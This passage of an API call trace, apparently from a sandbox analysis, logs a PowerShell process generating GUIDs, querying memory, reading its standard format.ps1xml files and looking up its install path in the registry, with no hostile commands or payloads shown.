[7]=0xe4))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x580bc07d, Data2=0x8a2f, Data3=0x43b5, Data4=([0]=0x8d, [1]=0xc6, [2]=0x60, [3]=0x0, [4]=0xe7, [5]=0xbb, [6]=0xb9, [7]=0x13))) returned 0x0 [0052.826] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x85d8a03b, Data2=0x67e1, Data3=0x40b7, Data4=([0]=0xa7, [1]=0x1a, [2]=0xd0, [3]=0xa1, [4]=0x5d, [5]=0x12, [6]=0x5a, [7]=0x80))) returned 0x0 [0052.827] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.827] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xdc8ef19f, Data2=0x3e40, Data3=0x409c, Data4=([0]=0xa5, [1]=0xb8, [2]=0x68, [3]=0xa3, [4]=0x45, [5]=0xa0, [6]=0x6b, [7]=0x17))) returned 0x0 [0052.827] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.827] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.827] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x3d32e643, Data2=0x5c38, Data3=0x41fd, Data4=([0]=0x91, [1]=0xb1, [2]=0xfc, [3]=0x61, [4]=0xcf, [5]=0x60, [6]=0x9b, [7]=0xa4))) returned 0x0 [0052.828] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x63399b76, Data2=0x17f7, Data3=0x4166, Data4=([0]=0x88, [1]=0xda, [2]=0x39, [3]=0xf8, [4]=0x9, [5]=0xcd, [6]=0xcc, [7]=0xfe))) returned 0x0 [0052.828] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd10901de, Data2=0xee44, Data3=0x4d75, Data4=([0]=0x8a, [1]=0x6d, [2]=0xd8, [3]=0xd5, [4]=0xa5, [5]=0xbc, [6]=0x19, [7]=0xf4))) returned 0x0 [0052.828] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xac0ac4d7, Data2=0x48d5, Data3=0x4191, Data4=([0]=0x8b, [1]=0xf9, [2]=0x4a, [3]=0x30, [4]=0xf5, [5]=0xcd, [6]=0xb6, [7]=0xda))) returned 0x0 [0052.828] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.828] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x3f40e221, Data2=0x1499, Data3=0x4fe1, Data4=([0]=0xa7, [1]=0x3, [2]=0x92, [3]=0xa6, [4]=0xfa, [5]=0x48, [6]=0x5b, [7]=0xe0))) returned 0x0 [0052.828] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.829] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.829] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.830] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.830] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.830] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x4ce89d7b, Data2=0xe4b3, Data3=0x4634, Data4=([0]=0x8a, [1]=0x51, [2]=0xe4, [3]=0xbc, [4]=0x33, [5]=0x4b, [6]=0x50, [7]=0xef))) returned 0x0 [0052.830] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xc40600ca, Data2=0x42a6, Data3=0x4c2c, Data4=([0]=0xbd, [1]=0xcc, [2]=0x72, [3]=0xb3, [4]=0x14, [5]=0x1e, [6]=0x8f, [7]=0x6))) returned 0x0 [0052.830] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x11ebfcdf, Data2=0x4d5e, Data3=0x4022, Data4=([0]=0xa6, [1]=0x41, [2]=0x40, [3]=0xc5, [4]=0x83, [5]=0xa5, [6]=0x4a, [7]=0x40))) returned 0x0 [0052.831] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x412dc8ef, Data2=0xe3c9, Data3=0x4256, Data4=([0]=0xb7, [1]=0xa5, [2]=0xa0, [3]=0x6e, [4]=0x37, [5]=0x20, [6]=0x7c, [7]=0xf7))) returned 0x0 [0052.831] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x8c48405a, Data2=0x572, Data3=0x4b47, Data4=([0]=0x86, [1]=0xd6, [2]=0x67, [3]=0x51, [4]=0x42, [5]=0x53, [6]=0xd, [7]=0x38))) returned 0x0 [0052.831] VirtualQuery (in: lpAddress=0x14d864, lpBuffer=0x14e864, dwLength=0x1c | out: lpBuffer=0x14e864*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.831] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x291c5535, Data2=0x9293, Data3=0x4811, Data4=([0]=0x85, [1]=0x62, [2]=0xa0, [3]=0x5, [4]=0xf7, [5]=0xf0, [6]=0x95, [7]=0xf5))) returned 0x0 [0052.831] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe2112e2b, Data2=0x9c5b, Data3=0x46d2, Data4=([0]=0xa6, [1]=0xdf, [2]=0xf2, [3]=0xef, [4]=0x44, [5]=0xbe, [6]=0x49, [7]=0xbb))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe26ee8d4, Data2=0x3f9, Data3=0x482d, Data4=([0]=0xba, [1]=0xfe, [2]=0xc3, [3]=0x63, [4]=0x9e, [5]=0x79, [6]=0x27, [7]=0x25))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xa962d382, Data2=0x448a, Data3=0x4c71, Data4=([0]=0x8a, [1]=0x93, [2]=0x33, [3]=0x93, [4]=0xd, [5]=0xf6, [6]=0x7e, [7]=0x35))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf5869d7e, Data2=0xb300, Data3=0x4b3e, Data4=([0]=0xa5, [1]=0xbc, [2]=0x37, [3]=0xde, [4]=0x9f, [5]=0xa4, [6]=0xd0, [7]=0x29))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb3691956, Data2=0x58bd, Data3=0x49c6, Data4=([0]=0x96, [1]=0xf0, [2]=0xc8, [3]=0x6b, [4]=0x28, [5]=0x89, [6]=0xea, [7]=0x74))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x38d6c17e, Data2=0xd3cb, Data3=0x40d2, Data4=([0]=0x95, [1]=0xed, [2]=0xa5, [3]=0x95, [4]=0x22, [5]=0x4b, [6]=0x9c, [7]=0x32))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9ae6333b, Data2=0x4429, Data3=0x45d2, Data4=([0]=0xbb, [1]=0x61, [2]=0x6a, [3]=0x88, [4]=0x61, [5]=0xa5, [6]=0xc, [7]=0xdd))) returned 0x0 [0052.832] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x49ff7f80, Data2=0xd7f7, Data3=0x42e5, Data4=([0]=0xa0, [1]=0x65, [2]=0xbf, [3]=0x17, [4]=0xce, [5]=0x48, [6]=0x51, [7]=0xdc))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd43a2537, Data2=0x882a, Data3=0x4e96, Data4=([0]=0x89, [1]=0x59, [2]=0xd, [3]=0xd7, [4]=0xdc, [5]=0xc4, [6]=0xef, [7]=0xca))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xdcade8f1, Data2=0xee77, Data3=0x406b, Data4=([0]=0x83, [1]=0x84, [2]=0x87, [3]=0x10, [4]=0xc1, [5]=0xd5, [6]=0xa2, [7]=0xc3))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x5028ef4f, Data2=0xbb21, Data3=0x4502, Data4=([0]=0x91, [1]=0xcc, [2]=0x9a, [3]=0x6b, [4]=0xaa, [5]=0x61, [6]=0x43, [7]=0xcb))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x88095cd8, Data2=0xa0d1, Data3=0x44bf, Data4=([0]=0x8e, [1]=0x73, [2]=0x4a, [3]=0x2e, [4]=0x37, [5]=0xe4, [6]=0xb0, [7]=0x64))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x148d20e8, Data2=0xa49b, Data3=0x460d, Data4=([0]=0x82, [1]=0x96, [2]=0xa7, [3]=0xdd, [4]=0x1b, [5]=0xec, [6]=0xcb, [7]=0x81))) returned 0x0 [0052.833] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xee29b2f0, Data2=0xbe69, Data3=0x417f, Data4=([0]=0x89, [1]=0xa9, [2]=0x86, [3]=0x41, [4]=0x88, [5]=0xcb, [6]=0xee, [7]=0xb2))) returned 0x0 [0052.834] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xca4f4c11, Data2=0xee83, Data3=0x442b, Data4=([0]=0x98, [1]=0x8c, [2]=0xbc, [3]=0xa5, [4]=0xff, [5]=0xdc, [6]=0x22, [7]=0x33))) returned 0x0 [0052.834] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x807a4f10, Data2=0x267b, Data3=0x44f0, Data4=([0]=0xbc, [1]=0xce, [2]=0xfc, [3]=0x3b, [4]=0x28, [5]=0xe7, [6]=0x10, [7]=0x15))) returned 0x0 [0052.834] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd330c9c1, Data2=0x45c5, Data3=0x4b7d, Data4=([0]=0xb1, [1]=0xc0, [2]=0x46, [3]=0x9a, [4]=0x86, [5]=0x6e, [6]=0x19, [7]=0x21))) returned 0x0 [0052.834] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x859745a2, Data2=0x649f, Data3=0x439b, Data4=([0]=0x96, [1]=0x86, [2]=0x91, [3]=0x81, [4]=0xc8, [5]=0x7, [6]=0xc2, [7]=0x60))) returned 0x0 [0052.834] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.834] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.835] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.836] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x87729405, Data2=0xdd9f, Data3=0x4222, Data4=([0]=0xa1, [1]=0x39, [2]=0x7d, [3]=0x38, [4]=0xe3, [5]=0x1b, [6]=0xbf, [7]=0x92))) returned 0x0 [0052.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.836] GetLastError () returned 0x0 [0052.836] SetErrorMode (uMode=0x1) returned 0x1 [0052.836] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.836] GetLastError () returned 0x0 [0052.836] GetFileType (hFile=0x2f8) returned 0x1 [0052.836] SetErrorMode (uMode=0x1) returned 0x1 [0052.836] GetFileType (hFile=0x2f8) returned 0x1 [0052.836] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.837] GetLastError () returned 0x0 [0052.838] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.838] GetLastError () returned 0x0 [0052.839] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.839] GetLastError () returned 0x0 [0052.839] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.839] GetLastError () returned 0x0 [0052.840] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x119, lpOverlapped=0x0) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] ReadFile (in: hFile=0x2f8, lpBuffer=0x24d7cbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x24d7cbc*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] CloseHandle (hObject=0x2f8) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.840] GetLastError () returned 0x0 [0052.840] SetErrorMode (uMode=0x1) returned 0x1 [0052.840] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24f8cb8 | out: lpFileInformation=0x24f8cb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0052.840] GetLastError () returned 0x0 [0052.840] SetErrorMode (uMode=0x1) returned 0x1 [0052.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.840] GetLastError () returned 0x0 [0052.840] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.841] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.841] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.841] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.841] GetLastError () returned 0x0 [0052.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0052.841] GetLastError () returned 0x0 [0052.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.842] GetLastError () returned 0x0 [0052.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.842] GetLastError () returned 0x0 [0052.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.842] GetLastError () returned 0x0 [0052.843] VirtualQuery (in: lpAddress=0x14d6c0, lpBuffer=0x14e6c0, dwLength=0x1c | out: lpBuffer=0x14e6c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.843] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb4c408a3, Data2=0x1521, Data3=0x4583, Data4=([0]=0xbc, [1]=0xd9, [2]=0xde, [3]=0xbb, [4]=0x2f, [5]=0xdf, [6]=0x4d, [7]=0xf))) returned 0x0 [0052.843] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.843] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb47bcfe, Data2=0xc22, Data3=0x4940, Data4=([0]=0x98, [1]=0x2, [2]=0x71, [3]=0x4d, [4]=0x11, [5]=0xd9, [6]=0x33, [7]=0xfd))) returned 0x0 [0052.843] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xfb1cf4ba, Data2=0xd251, Data3=0x4e54, Data4=([0]=0xa5, [1]=0x80, [2]=0x5, [3]=0x3c, [4]=0x6, [5]=0xe6, [6]=0x51, [7]=0xed))) returned 0x0 [0052.843] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xad43f71d, Data2=0xc7e, Data3=0x4064, Data4=([0]=0xbd, [1]=0x7d, [2]=0x7f, [3]=0xce, [4]=0xc7, [5]=0xe, [6]=0x97, [7]=0x60))) returned 0x0 [0052.844] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.844] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.844] GetLastError () returned 0x0 [0052.844] SetErrorMode (uMode=0x1) returned 0x1 [0052.844] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.844] GetLastError () returned 0x0 [0052.844] GetFileType (hFile=0x2f8) returned 0x1 [0052.844] SetErrorMode (uMode=0x1) returned 0x1 [0052.844] GetFileType (hFile=0x2f8) returned 0x1 [0052.845] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.846] GetLastError () returned 0x0 [0052.847] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.847] GetLastError () returned 0x0 [0052.847] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.847] GetLastError () returned 0x0 [0052.847] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.848] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.848] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.848] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.848] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.849] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.849] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, 